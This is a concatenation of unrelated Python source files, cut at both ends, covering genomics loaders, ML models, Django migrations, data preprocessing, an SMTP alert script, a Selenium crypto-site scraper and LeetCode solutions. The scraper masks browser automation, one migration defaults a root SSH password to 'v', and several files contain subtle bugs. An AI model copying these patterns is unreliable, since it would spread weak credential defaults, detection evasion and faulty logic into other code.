gwas = TextFileTools.load_dataframe(args.gwas_file, additional_filter=filter, columns=columns)[columns]
else:
logging.info("opening gwas file")
gwas = pandas.read_table(args.gwas_file, usecols =columns)[columns]
if args.chromosome: gwas = gwas.loc[gwas.chromosome == "chr{}".format(args.chromosome)]
logging.log(9, "Loaded %d GWAS variants", gwas.shape[0])
#Mind, the imputation must do the discarding of ambiguous
#gwas = GWASUtilities.discard_ambiguous(gwas)
return gwas
def trim_variant_metadata(args, vm, use_specific_targets):
chromosomes = {x for x in use_specific_targets.chromosome}
r = []
for chromosome in chromosomes:
u = use_specific_targets[use_specific_targets.chromosome == chromosome]
window_start = u.position.min() - args.window
window_end = u.position.max() + args.window
v = Genomics.entries_for_window(chromosome, window_start, window_end, vm)
r.append(v)
return pandas.concat(r)
def load_study(args):
study = Parquet.study_from_parquet(args.parquet_genotype, args.parquet_genotype_metadata, chromosome=args.chromosome)
vm = study.variant_metadata
vm.rename(columns={"allele_0":"non_effect_allele", "allele_1":"effect_allele", "allele_1_frequency":"effect_allele_frequency"}, inplace=True)
study.variant_metadata = vm[['chromosome', 'position', 'id', 'non_effect_allele', 'effect_allele', 'effect_allele_frequency', 'rsid']]
return study
########################################################################################################################
def context_from_args(args):
logging.info("Creating context by variant")
logging.info("Loading study")
study = load_study(args)
if args.sub_batches and args.sub_batch is not None:
logging.log(9, "Selecting targets from sub-batches")
use_specific_targets = PandasHelpers.sub_batch(study.variant_metadata, args.sub_batches, args.sub_batch)
study.variant_metadata = trim_variant_metadata(args, study.variant_metadata, use_specific_targets)
else:
use_specific_targets = None
logging.info("Loading gwas")
gwas = load_gwas(args, use_specific_targets)
if args.cache_variants:
context = CachingVariantContext(study, args.window, gwas, args.cutoff, args.regularization, args.frequency_filter, args.standardise_dosages, use_specific_targets)
else:
context = VariantContext(study, args.window, gwas, args.cutoff, args.regularization, args.frequency_filter, args.standardise_dosages, use_specific_targets)
return context
########################################################################################################################
def load_region(args, study):
regions = pandas.read_table(args.by_region_file).rename(columns={"chr":"chromosome", "stop":"end"})
regions = regions.dropna()
regions = regions.assign(chromosome = regions.chromosome.str.split("chr").str.get(1).astype(numpy.int32))
use_specific_targets = None
if args.chromosome:
logging.log(9, "Selecting target regions with specific chromosome")
regions = regions.loc[regions.chromosome == args.chromosome]
if args.containing:
logging.log(9, "Selecting target regions with specific position")
regions = regions[(regions.chromosome == args.chromosome) & (regions.start <= args.containing) & (args.containing <= regions.end)]
regions = regions.reset_index(drop=True)
if args.sub_batches and args.sub_batch is not None:
logging.log(9, "Selecting target regions from sub-batches")
regions = PandasHelpers.sub_batch(regions, args.sub_batches, args.sub_batch)
if args.chromosome or (args.sub_batches and args.sub_batch is not None):
logging.log(9, "generating GWAS whitelist")
use_specific_targets = []
for region in regions.itertuples():
w = Genomics.entries_for_window(region.chromosome, region.start - args.window, region.end + args.window, study.variant_metadata)
use_specific_targets.append(w)
use_specific_targets = pandas.concat(use_specific_targets).drop_duplicates()
return regions, use_specific_targets
def context_by_region_from_args(args):
logging.info("Creating context by variant")
logging.info("Loading study")
study = load_study(args)
logging.info("Loading regions")
regions, use_specific_targets = load_region(args, study)
logging.info("Loading gwas")
gwas = load_gwas(args, use_specific_targets)
context = RegionContext(study, args.window, gwas, args.cutoff, args.regularization, args.frequency_filter, regions,
args.standardise_dosages, args.keep_palindromic_imputation, args.use_palindromic_snps)
return context
|
# """
# Special cases tests for ceil.
#
# These tests are generated from the special cases listed in the spec.
#
# NOTE: This file is generated automatically by the generate_stubs.py script. Do
# not modify it directly.
# """
#
# from ..array_helpers import NaN, assert_exactly_equal, exactly_equal, infinity, isintegral, zero
# from ..hypothesis_helpers import numeric_arrays
# from .._array_module import ceil
#
# from hypothesis import given
#
#
# @given(numeric_arrays)
# def test_ceil_special_cases_one_arg_equal_1(arg1):
# """
# Special case test for `ceil(x, /)`:
#
# - If `x_i` is already integer-valued, the result is `x_i`.
#
# """
# res = ceil(arg1)
# mask = isintegral(arg1)
# assert_exactly_equal(res[mask], (arg1)[mask])
#
#
# @given(numeric_arrays)
# def test_ceil_special_cases_one_arg_equal_2(arg1):
# """
# Special case test for `ceil(x, /)`:
#
# - If `x_i` is `+infinity`, the result is `+infinity`.
#
# """
# res = ceil(arg1)
# mask = exactly_equal(arg1, infinity(arg1.shape, arg1.dtype))
# assert_exactly_equal(res[mask], (infinity(arg1.shape, arg1.dtype))[mask])
#
#
# @given(numeric_arrays)
# def test_ceil_special_cases_one_arg_equal_3(arg1):
# """
# Special case test for `ceil(x, /)`:
#
# - If `x_i` is `-infinity`, the result is `-infinity`.
#
# """
# res = ceil(arg1)
# mask = exactly_equal(arg1, -infinity(arg1.shape, arg1.dtype))
# assert_exactly_equal(res[mask], (-infinity(arg1.shape, arg1.dtype))[mask])
#
#
# @given(numeric_arrays)
# def test_ceil_special_cases_one_arg_equal_4(arg1):
# """
# Special case test for `ceil(x, /)`:
#
# - If `x_i` is `+0`, the result is `+0`.
#
# """
# res = ceil(arg1)
# mask = exactly_equal(arg1, zero(arg1.shape, arg1.dtype))
# assert_exactly_equal(res[mask], (zero(arg1.shape, arg1.dtype))[mask])
#
#
# @given(numeric_arrays)
# def test_ceil_special_cases_one_arg_equal_5(arg1):
# """
# Special case test for `ceil(x, /)`:
#
# - If `x_i` is `-0`, the result is `-0`.
#
# """
# res = ceil(arg1)
# mask = exactly_equal(arg1, -zero(arg1.shape, arg1.dtype))
# assert_exactly_equal(res[mask], (-zero(arg1.shape, arg1.dtype))[mask])
#
#
# @given(numeric_arrays)
# def test_ceil_special_cases_one_arg_equal_6(arg1):
# """
# Special case test for `ceil(x, /)`:
#
# - If `x_i` is `NaN`, the result is `NaN`.
#
# """
# res = ceil(arg1)
# mask = exactly_equal(arg1, NaN(arg1.shape, arg1.dtype))
# assert_exactly_equal(res[mask], (NaN(arg1.shape, arg1.dtype))[mask])
|
#!/usr/bin/env python
# Filename: get_intersection
"""
introduction: get intersection polygons
authors: Huang Lingcao
email:huanglingcao@gmail.com
add time: 1 March, 2019
"""
import os,sys
from optparse import OptionParser
HOME = os.path.expanduser('~')
# path of DeeplabforRS
codes_dir2 = HOME + '/codes/PycharmProjects/DeeplabforRS'
sys.path.insert(0, codes_dir2)
import basic_src.basic as basic
import vector_features
def main(options, args):
polygons_shp1 = args[0]
polygons_shp2 = args[1]
output = options.output
copy_fields = options.copy_fields
if copy_fields is not None:
copy_fields = copy_fields.split(',')
if vector_features.get_intersection_of_polygon_polygon(polygons_shp1,polygons_shp2,output,copy_field=copy_fields):
basic.outputlogMessage('get intersection, save to %s'%output)
else:
basic.outputlogMessage('get intersection failed')
if __name__ == "__main__":
usage = "usage: %prog [options] shp_file1 shp_file2"
parser = OptionParser(usage=usage, version="1.0 2019-3-1")
parser.description = 'Introduction: get intersection polygons'
parser.add_option("-o", "--output",
action="store", dest="output",
help="the output")
parser.add_option("-c", "--copy_fields",
action="store", dest="copy_fields",
help="the multi field names to be copied, e.g., 'area,perimeter', use comma to sperate them but no space")
(options, args) = parser.parse_args()
if len(sys.argv) < 2:
parser.print_help()
sys.exit(2)
main(options, args) |
import torch
import torch.nn as nn
from torch.autograd import Variable
from torch.nn import Embedding, LSTM
class LSTMClassifier(nn.Module):
def __init__(self, output_size, hidden_size, layers_num, bidirectional,
vocab_size, dropout, embedding_length, weights):
super(LSTMClassifier, self).__init__()
self.output_size = output_size
self.hidden_size = hidden_size
self.vocab_size = vocab_size
self.embedding_length = embedding_length
self.layers_num = 2 * layers_num if bidirectional else layers_num
self.word_embedding = Embedding(vocab_size, embedding_length)
self.word_embedding.weights = nn.Parameter(
weights, requires_grad=False)
self.lstm = LSTM(embedding_length, hidden_size,
num_layers=layers_num, dropout=dropout,
bidirectional=bidirectional)
# self.dropout = Dropout(dropout)
self.label = nn.Linear(self.layers_num * hidden_size, output_size)
def forward(self, x):
x = self.word_embedding(x)
x = x.permute(1, 0, 2)
h_0 = Variable(torch.rand(self.layers_num,
x.size(1), self.hidden_size))
c_0 = Variable(torch.rand(self.layers_num,
x.size(1), self.hidden_size))
if torch.cuda.is_available():
h_0 = h_0.cuda(torch.device('cuda'))
c_0 = c_0.cuda(torch.device('cuda'))
output, (final_hidden_state, final_cell_state) = self.lstm(
x, (h_0, c_0))
out = final_hidden_state.permute(1, 0, 2)
out = out.contiguous().view(out.size(0), out.size(1) * out.size(2))
out = self.label(out)
return torch.sigmoid(out)
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('harvest', '0009_auto_20160219_1402'),
]
operations = [
migrations.AlterField(
model_name='job',
name='publish',
field=models.ForeignKey(on_delete=django.db.models.deletion.SET_NULL, editable=False, to='tablemanager.Publish', null=True),
preserve_default=True,
),
]
|
import glob
import numpy as np
from os.path import basename, isdir, isfile
from PIL import Image
from osm import OSMinterface
class PatchFinder:
def __init__(self, osm_dir, image=None):
self.image = image
if isdir(osm_dir):
if osm_dir[-1] == "/":
self.osm_dir = osm_dir
else:
self.osm_dir = osm_dir + "/"
elif isfile(osm_dir):
self.osm_dir = osm_dir
self.osms = None
def load_osm_location_distances(self, image=None):
self.image = image
img_loc = self.get_gps_location(image)
self.osms = {}
osm_to_check = []
if isfile(self.osm_dir):
osm_to_check = [self.osm_dir]
elif isdir(self.osm_dir):
osm_to_check = glob.glob(self.osm_dir + "*.osm")
for i in osm_to_check:
f = OSMinterface(i)
f.read()
self.osms[basename(i)] = {}
if f.location_in_map(img_loc):
self.osms[basename(i)]["on_map"] = True
if any(f.location_in_object(img_loc).values()):
self.osms[basename(i)]["in_object"] = \
f.location_in_object(img_loc)
else:
self.osms[basename(i)]["in_object"] = False
self.osms[basename(i)]["dist_from_object"] = \
f.location_distance_from_objects(img_loc)
else:
self.osms[basename(i)]["on_map"] = False
self.osms[basename(i)]["dist_from_map"] = \
f.location_distance_from_map(img_loc)
f = None
def print_location(self):
# Is in any patch?
maps = []
for k in self.osms:
if self.osms[k]["on_map"]:
maps.append(k)
patches = []
for m in maps:
if self.osms[m]["im_object"]:
patches.append(m)
if maps:
obj_dist = []
print "The photo", self.image, "is located in the following maps:"
for m in maps:
print " *", m
for o in self.osms[m]["dist_from_object"]:
obj_dist.append((self.osms[m]["dist_from_object"][o], m, o))
cp = min(obj_dist)
if patches:
print "It is in the following objects:"
for m in patches:
for p in self.osms[m]["in_object"]:
if self.osms[m]["in_object"][p]:
print " * map", m, "patch", p
else:
print "It is not in any particular object."
print "The closes patch is:", cp[2], "on map", cp[1], \
"in distance", cp[0]
else:
print "The photo:", self.image, "is not in any of the specified \
maps."
dist_map = []
for m in self.osms:
dist_map.append((self.osms[m]["dist_from_map"], m))
cm = min(dist_map)
print "The closes map is:", cm[1], "within", cm[0], "distance."
print "~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*"
def get_gps_location(self, image=None):
if image is None:
f = self.image
else:
f = image
return self.get_lat_lon(Image.open(f)._getexif())
def get_lat_lon(self, info):
get_float = lambda x: float(x[0]) / float(x[1])
def convert_to_degrees(value):
d = get_float(value[0])
m = get_float(value[1])
s = get_float(value[2])
return d + (m / 60.0) + (s / 3600.0)
try:
gps_latitude = info[34853][2]
gps_latitude_ref = info[34853][1]
gps_longitude = info[34853][4]
gps_longitude_ref = info[34853][3]
lat = convert_to_degrees(gps_latitude)
if gps_latitude_ref != "N":
lat *= -1
lon = convert_to_degrees(gps_longitude)
if gps_longitude_ref != "E":
lon *= -1
return lat, lon
except KeyError:
return None
|
"""
Predicting Equity Index Returns using Machine Learning Methods - Data Preparation File
"""
#%% #--------------------------------------------------
#* Load Data
import pickle
import pandas as pd
import os
from pandas.tseries.offsets import MonthEnd # To Determine the End of the Corresponding Month
dir = os.getcwd()
df = pd.read_csv('data/raw/neely_2014.csv', na_values = ['NaN'])
df.rename( index=str, columns={"date": "ym"}, inplace=True)
df['date'] = pd.to_datetime(df['ym'],format='%Y%m') + MonthEnd(1)
df['sp500_rf'] = df['sp500_rf'] * 100
df['lnsp500_rf'] = df['lnsp500_rf'] * 100
df = df.sort_values(by=['date'])
df.index = df.index.astype(int)
os.makedirs(dir + '/data/processed/', exist_ok = True)
df.to_pickle("data/processed/df.pickle")
print("Processed data is saved as" + " data/processed/df.pickle")
|
# Copyright 2020, Schuberg Philis B.V
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from cosmicops.log import logging
from .vm import CosmicVM
class CosmicRouter(CosmicVM):
def reboot(self):
if self.dry_run:
logging.info(f"Would reboot router '{self['name']}")
return True
logging.info(f"Rebooting router '{self['name']}'", self.log_to_slack)
response = self._ops.cs.rebootRouter(id=self['id'])
if not self._ops.wait_for_job(response['jobid']):
logging.error(f"Failed to reboot router '{self['name']}'")
return False
return True
|
from .clustergram import Clustergram
|
import json
from typing import Dict, List, Optional, Set, Union
import justobjects as jo
@jo.data(typed=True)
class Troll:
weight: Union[int, float]
sex: str = "male"
@jo.data(typed=True)
class Droll:
style: Optional[int] = 12
trolls: Optional[Set[Troll]] = set()
@jo.data(typed=True)
class Sphinx:
age: int
drolls: Droll
sexes = Union[bool, str]
weights: Dict[str, List[Troll]]
print(json.dumps(jo.show_schema(Sphinx), indent=2))
|
from person import Person
from enrolled import Enroll
class Student(Person): #student inherits from person
def __init__(self, first, last, dob, phone, address, international=False):
super().__init__(self, first, last, dob, phone, address)
self.international = international
self.enrolled = []
def add_enrollment(self, enroll):
if not isinstance(enroll, Enroll):
raise Exception("Invalid Enroll. . . ")
self.enrolled.append(enroll)
def is_on_probation(self):
return False
def is_part_time(self):
return len(self.enrolled) <= 3
|
# Generated by Django 2.2.16 on 2022-01-20 05:58
from django.db import migrations, models
import uuid
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Deployment',
fields=[
('uuid', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('host', models.CharField(default='', max_length=256, verbose_name='Host FQDN/IP')),
('index', models.IntegerField(blank=True, default=-1, verbose_name='Host Index Number')),
('port', models.IntegerField(blank=True, default=0, verbose_name='Host Port')),
('deploypath', models.CharField(blank=True, default='', max_length=256, verbose_name='Deployment Path')),
('consoleid', models.IntegerField(blank=True, default=0, verbose_name='Console ID')),
('apptype', models.CharField(default='', max_length=64, verbose_name='User Name')),
],
options={
'verbose_name': 'Deployment',
'verbose_name_plural': 'Deployments',
},
),
migrations.CreateModel(
name='Host',
fields=[
('uuid', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('ipaddr', models.CharField(default='', max_length=64, verbose_name='FQDN/IP')),
('sshport', models.IntegerField(blank=True, default=22, verbose_name='SSH Port')),
('username', models.CharField(default='root', max_length=64, verbose_name='User Name')),
('password', models.CharField(default='v', max_length=64, verbose_name='Password')),
('deployroot', models.CharField(blank=True, default='/root', max_length=256, verbose_name='Deployment Root')),
('status', models.CharField(blank=True, choices=[('available', 'available'), ('maintainance', 'maintainance')], default='maintainance', max_length=64, verbose_name='Status')),
('capacity', models.IntegerField(blank=True, default=20, verbose_name='Capacity')),
('startport', models.IntegerField(blank=True, default=6950, verbose_name='Start Port')),
('current_num', models.IntegerField(blank=True, default=0, verbose_name='Deployed Number')),
('deployment', models.CharField(blank=True, default='', max_length=256, verbose_name='Deployment')),
],
options={
'verbose_name': 'Host',
'verbose_name_plural': 'Hosts',
},
),
]
|
''' Explore the statistics of dataset and Preprocess the dataset '''
import time
import sys
import numpy as np
import pandas as pd
from sklearn.cross_validation import train_test_split, KFold
import multiprocessing
###################################################################################################
# Read weather data and process weather data for missing values
# Write processed weather data to csv file
###################################################################################################
''' Check if a string is a number (int or float) '''
def is_number(s):
try:
float(s)
return True
except ValueError:
pass
try:
import unicodedata
unicodedata.numeric(s)
return True
except (TypeError, ValueError):
pass
return False
'''
Process and impute weather data information. weather_data here has 18 columns(without station_nbr and date)
variable: data: array with 17 columns (codesum is removed, and all converted to float values)
columns names wit 19 elements
Output: Write porcessed weather data into csv file
'''
def process_weather():
weather_file = pd.read_csv("Data/weather.csv", sep=',')
weather_data = weather_file.drop('codesum', axis = 1) # Drop "codesum" column
data = weather_data.values[:,2:] # Get rid of station_nbr and date
# Fill in the missing values
for col in range(data.shape[1]):
for row in range(data.shape[0]):
if not is_number(data[row, col]):
if row == 0:
i = 1
while not is_number(data[row+i, col]):
i += 1
data[row, col] = data[row+i, col]
else:
data[row, col] = data[row-1, col]
data[row, col] = float(data[row, col]) # Convert string to float value
weather_processed = np.append(weather_file.values[:,0:2], data, axis = 1)
df = pd.DataFrame(weather_processed, index=None, columns=weather_data.columns.values)
df.to_csv("Data/weather_processed.csv", sep=',', index=None)
###################################################################################################
# Match training data and corresponding weather data
# Get the weather dataset for each item
# Write the item dataset to csv file
##################################################################################################
''' Create store_nbr index on station_nbr using DataFrame and index '''
def match_store_station():
key_file = pd.read_csv("Data/key.csv", sep=',')
df = pd.DataFrame(key_file.values[:,1], index = key_file.values[:,0])
return df
'''
Create (date, station_nbr) index on weather data using DataFrame and Multi-index
Output: DataFrame with 17 columns of features and 2 indexs on (date, station_nbr)
'''
def read_processed_weather():
weather_file = pd.read_csv("Data/weather_processed.csv", sep = ',')
multi_index = [weather_file.values[:,1], weather_file.values[:,0]]
df = pd.DataFrame(weather_file.values[:,2:], index=multi_index, columns=weather_file.columns.values[2:])
return df
'''
Given date and store_nbr, return the corresponding weather data features. Specific use for match new test samples
Output: 1x17 vectors
'''
def get_weather_data(date, store_nbr, store_station_pairs, weather_file):
station_nbr = store_station_pairs.loc[store_nbr].values[0]
weather_data = weather_file.loc[date, station_nbr].values
return weather_data
'''Get the list of unique item id in train file'''
def get_item_list():
train_file = pd.read_csv("Data/train.csv", sep=',')
item_list = list(set(list(train_file.values[:,2])))
return item_list
'''
Given the item_nbr, retrieve all corresponding weather features
Input: item_nbr - item id
num - percentage of the number of samples should be retrieved
Output: Array with 18 columns, which contains 17 features and 1 label (the last column is label)
'''
def get_item_data(item_nbr, percent, store_station_pairs, weather_file, train_file):
start = time.time()
train_num = train_file.values[:,1].shape[0]
item_index = np.where(train_file.values[:,2] == item_nbr)
item_index = item_index[0]
num = int(item_index.shape[0]*(1-percent)) # Select according to the given percentage, need to be improved
iter_list = range(num, item_index.shape[0])
item_dataset = np.zeros((len(iter_list), weather_file.values.shape[1]+1))
count = 0
#print len(iter_list)
for i in iter_list:
index = item_index[i]
#print count
date = train_file.values[:,0][index]
store_nbr = train_file.values[:,1][index]
units = train_file.values[:,3][index]
weather_data = get_weather_data(date, store_nbr, store_station_pairs, weather_file)
item_dataset[count,:] = np.append(weather_data, [units], axis=0)
count += 1
end = time.time()
print "Running time for item %d: %f" %(int(item_nbr), (end-start))
return item_dataset
def write_item_data(tasks):
item_list = tasks.get()
#print item_list
store_station_pairs = match_store_station()
weather_file = read_processed_weather() # index has 2 columns and values has 17 columns
train_file = pd.read_csv("Data/train.csv", sep=',')
#item_list = get_item_list()
#item_nbr = item_list[0]
for item_nbr in item_list:
item_dataset = get_item_data(item_nbr, 0.1, store_station_pairs, weather_file, train_file) # Give percentage
df = pd.DataFrame(item_dataset, index=None, columns=None)
filename = "Item_data/item_%d.csv" %(int(item_nbr))
df.to_csv(filename, sep=',', index=None, columns=None)
'''Multiprocessing for using all cpu cores'''
def multi_process(traget_func):
processors = multiprocessing.cpu_count()
myTasks = multiprocessing.Queue()
item_list = get_item_list()
temp_part = []
div = len(item_list)/(processors-1)
rem = len(item_list)%(processors-1)
ind = 0
while ind < div*(processors-1):
temp_part.append(item_list[ind:ind+div])
ind = ind+div
temp_part.append(item_list[(len(item_list)-rem):])
for each in temp_part:
myTasks.put(each)
Workers = [multiprocessing.Process(target = traget_func, args =(myTasks,)) for i in range(processors)]
#Workers[0].start()
for each in Workers:
each.start()
#multi_process(write_item_data)
##################################################################################################
# Read Item dataset for a given item_nbr
# Split the item dataset for training and test
##################################################################################################
def read_item_data(item_nbr):
filename = "Item_data/item_%d.csv" %(int(item_nbr))
item_dataset = pd.read_csv(filename, sep=',')
item_data = item_dataset.values[:,0:-1]
item_label = item_dataset.values[:,-1]
return item_data, item_label
def split_item_data(item_nbr, type):
item_data, item_label = read_item_data(item_nbr)
X_train, X_test, y_train, y_test = train_test_split(item_data, item_label, test_size=0.25, random_state=42)
if type == 'train':
return X_train, y_train
elif type == 'test':
return X_test, y_test
##################################################################################################
# Store the full matched weather data into csv file
# Too long to run, no use for now
##################################################################################################
'''
Get the training dataset and match with weather features
Generate the csv file contains training data and corresponding weather features
'''
def get_full_data():
train_file = pd.read_csv("Data/train.csv", sep=',')
store_station_pairs = match_store_station()
weather_file = read_weather() # index has 2 columns and values has 18 columns
train_num = train_file.values[:,1].shape[0]
item_dataset = [] # Should be 20 columns
for ind in range(train_num):
store_nbr = train_file.values[:,1][ind]
date = train_file.values[:,0][ind]
weather_data = get_weather_data(date, store_nbr, store_station_pairs, weather_file)
weather_data = np.append(train_file.values[:,2:][ind], weather_data, axis = 1) #[item_nbr, units, weather_features]
item_dataset.append(weather_data)
item_dataset = np.array(item_dataset)
train_columns = np.append(np.array(['item_nbr','units']), weather_file.columns.values, axis=1)
train_df = pd.DataFrame(item_dataset, index=None, columns=train_columns) # Build item_nbr index on units and weather features
train_df.to_csv("train_feature_matrix.csv", sep=',', index=None)
return train_df
#get_full_data()
''' Read in the full training data with corresponding weather features,
should have 19 columns, and the first column is the item_nbr '''
def read_full_data():
train_features = pd.read_csv("train_feature_matrix.csv", sep=',')
train_df = pd.DataFrame(train_features.values[:,1:], index=train_features.values[:,0], columns=train_features.columns.values[1:])
print train_df
|
class F1:
def show(self):
print(" messege from class F1")
class F2(F1):
def disp(self):
print("Messege from F2")
k = F1()
k.show()
p = F2()
p.show()
p.disp()
|
import logging
from flask import redirect
from flask import url_for
from structlog import wrap_logger
from console import __version__
from console import app
from console import settings
logger = wrap_logger(logging.getLogger(__name__))
@app.route('/')
def localhost_to_submit():
return redirect(url_for('submit_bp.submit'))
if __name__ == '__main__':
logger.info("Starting server: version='{}'".format(__version__))
port = int(settings.PORT)
app.run(debug=True, host='0.0.0.0', port=port, threaded=True)
|
import os
import smtplib
#instead of providing email adress and password in python program
#We are passing these credential using sytem environment variables for security purpose
EMAIL_ADDRESS = ''
#it will get value of system environment variables named "EMAIL_USER"
EMAIL_PASSWORD = ''
#it will get value of system environment variables named "EMAIL_PASS" saved in local system
#Using context manager we will make sure that our connection is closed automatically
#Email is submitted by a mail client (mail user agent, MUA) to a mail server (mail submission agent, MSA) using SMTP on TCP port 587
#SMTP servers commonly use the Transmission Control Protocol on port number 25 (for plaintext) and 587 (for encrypted communications).
# 'smtp.gmail.com for google mail service and we can use our localhost to send test email.
with smtplib.SMTP('smtp.gmail.com', 587) as smtp:
#ehlo() method identifies ourself with the mail server that we are using
smtp.ehlo()
#Put the SMTP connection in TLS (Transport Layer Security) mode. All SMTP commands that follow will be encrypted.
# You should then call ehlo() again
smtp.starttls()
smtp.ehlo()
smtp.login(EMAIL_ADDRESS, EMAIL_PASSWORD)
#Header of mail
subject = "Face Mask Voilation"
#body of mail
body = "One Visitor voilated Face Mask Policy. He is not wearing the mask"
#to construct the plaintext email we will add subject as header and then after couple of blank line
#we will input body of email and we are using fstring for this
msg = f' Subject: {subject}\n\n{body}'
smtp.sendmail(EMAIL_ADDRESS, EMAIL_ADDRESS,msg)
#in order to send the email through python using gmail account we have to do some setting in our gmail account
#We have to turn on less secure app access and have to remove two factor authentication in gmail account
#We are using a demo gmail id to send the message.
# os.environ.get(
|
class Solution:
def maxProfit(self, prices: List[int]) -> int:
n = len(prices)
if n <=1: return 0
min_buy = prices[0]
dp_left, dp_right = [0]*n, [0]*n
for i in range(1,n):
min_buy = min(min_buy, prices[i])
dp_left[i] = max(dp_left[i-1], prices[i] - min_buy)
max_sell = prices[-1]
for i in range(n-2, -1, -1):
max_sell = max(max_sell, prices[i])
dp_right[i] = max(max_sell - prices[i], dp_right[i-1])
res = 0
for x, y in zip(dp_left,dp_right):
res = max(res, x+y)
return res
# ๆฑๆๅผ๏ผ่่DP
# ๅๅซไปๅทฆ(1,n-1) ๅณ(n-2,0)่ฎก็ฎๆๅคงprofit
# ๆฏๅฆ [a,b,c,d,e,f,g,h,i], ไปฅeไธบๅๅฒ็น๏ผeไนๅๆๅคงprofit็dp_leftใ eไนๅๆๅคงprofit็dp_right. |
nome = str(input('Digite seu nome completo: ')).strip()
print('Analisando seu nome...')
print('Seu nome em maiscรบlas รฉ ', nome.upper())
print('Seu nome em minรบsculas รฉ ', nome.lower())
print('Seu nome tem ao todo {} letras'.format(len(nome.replace(' ', ''))))
dividido = nome.split()
print('Seu primeiro nome รฉ {} e tem {} letras'.format(dividido[0], nome.find(' ')))
|
from Models.Pair import Pair
from selenium import webdriver
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as ec
from selenium.webdriver.common.by import By
from selenium.common.exceptions import TimeoutException
from selenium.common.exceptions import NoSuchElementException
from webdriver_manager.chrome import ChromeDriverManager
import time, sys
class Bitsgap:
def __init__(self, credentials, max_number_of_pairs, should_print = False):
self.credentials = credentials
self.max_number_of_pairs = max_number_of_pairs
self.should_print = should_print
self.__init_driver()
def __init_driver(self):
options = webdriver.ChromeOptions()
options.add_argument("--disable-blink-features")
options.add_argument("--disable-blink-features=AutomationControlled")
options.add_argument("--start-maximized")
#options.add_argument("--kiosk")
self.driver = webdriver.Chrome(ChromeDriverManager().install(), options=options)
time.sleep(5)
def login(self):
self.driver.get("https://bitsgap.com/sign-in/?d=app")
WebDriverWait(self.driver, 10).until(ec.visibility_of_element_located((By.XPATH, "//input[@id='lemail']")))
self.driver.find_element_by_xpath("//input[@id='lemail']").send_keys(self.credentials.username)
self.driver.find_element_by_xpath("//input[@id='lpassword']").send_keys(self.credentials.password)
actions = ActionChains(self.driver)
actions.send_keys(Keys.ENTER)
actions.perform()
time.sleep(5)
self.driver.execute_script("window.scrollTo(0, document.body.scrollHeight);")
self.__wait_for_strategy_list()
def __get_pairs(self, category = Pair.categories['Month']):
results = set()
for i in range(0, self.max_number_of_pairs):
pairs_and_profit, pairs_range = self.__get_pairs_and_profit_list()
for j in pairs_range:
pair_index = j
profit_index = j + 1
results.add( Pair(
symbol_str = pairs_and_profit[ pair_index ],
profit_str = pairs_and_profit[ profit_index ],
category = category
) )
if len(results) >= self.max_number_of_pairs:
return results
self.__scroll_list_down()
return results
def __get_pairs_and_profit_list(self):
pairs_and_profit__dom = self.driver.find_element_by_xpath("//div[@class='strategies-list']")
pairs_and_profit = pairs_and_profit__dom.text.splitlines()
pairs_amount = int( len( pairs_and_profit ) / 2 )
pairs_range = range(0, pairs_amount, 2 )
return pairs_and_profit, pairs_range
def get_month(self):
monthly_pairs = self.__get_pairs(category = Pair.categories['Month'])
self.__print(monthly_pairs)
self.__print("------------final--------------------month-------------")
return monthly_pairs
def get_week(self):
self.__switch_list(current_text = 'Month', index = 1)
weekly_pairs = self.__get_pairs(category = Pair.categories['Week'])
self.__print(weekly_pairs)
self.__print("------------final--------------------Week-------------")
return weekly_pairs
def get_three_days(self):
self.__switch_list(current_text = 'Week', index = 0)
daily_pairs = self.__get_pairs(category = Pair.categories['3_days'])
self.__print(daily_pairs)
self.__print("------------final--------------------Daily-------------")
return daily_pairs
def __switch_list(self, current_text = 'Month', index = 1):
strategies = self.driver.find_element_by_xpath("//div[@class='strategies']")
xpath_str = "//span[contains(text(),'{}')]".format(current_text)
strategies.find_element_by_xpath( xpath_str ).click()
time.sleep(2)
self.driver.find_elements_by_xpath("//li[@class='MuiButtonBase-root MuiListItem-root MuiMenuItem-root strategies__menu-item MuiMenuItem-gutters MuiListItem-gutters MuiListItem-button']")[index].click()
time.sleep(2)
self.__wait_for_strategy_list()
def __wait_for_strategy_list(self):
WebDriverWait(self.driver, 30).until(ec.visibility_of_element_located((By.XPATH, "//div[@class='strategies__list']")))
def __scroll_list_down(self):
self.driver.execute_script("document.querySelector('.strategies-list').scrollBy(0,100)")
time.sleep(2)
def cleanup(self):
self.driver.quit()
def __print(self, payload):
if self.should_print:
try:
[print(vars(item)) for item in payload]
except:
print(payload)
|
r"""
Given a binary search tree, rearrange the tree in in-order so that the leftmost node in the tree is now the root of
the tree, and every node has no left child and only 1 right child.
Example 1:
Input: [5,3,6,2,4,null,8,1,null,null,null,7,9]
5
/ \
3 6
/ \ \
2 4 8
/ / \
1 7 9
Output: [1,null,2,null,3,null,4,null,5,null,6,null,7,null,8,null,9]
1
\
2
\
3
\
4
\
5
\
6
\
7
\
8
\
9
Constraints:
1. The number of nodes in the given tree will be between 1 and 100.
2. Each node will have a unique integer value from 0 to 1000.
"""
class TreeNode:
"""Definition for a binary tree node."""
def __init__(self, val=0, left=None, right=None):
self.val = val
self.left = left
self.right = right
class Solution:
def increasingBST1(self, root):
nodes = []
def dfs(tree):
if tree:
dfs(tree.left)
nodes.append(tree.val)
dfs(tree.right)
dfs(root)
res = cur = TreeNode()
for x in nodes:
cur.right = TreeNode(x)
cur = cur.right
return res.right
# nodes = []
# def dfs(tree):
# if tree:
# dfs(tree.right)
# nodes.append(tree.val)
# dfs(tree.left)
#
# dfs(root)
#
# res = TreeNode(val=nodes[0])
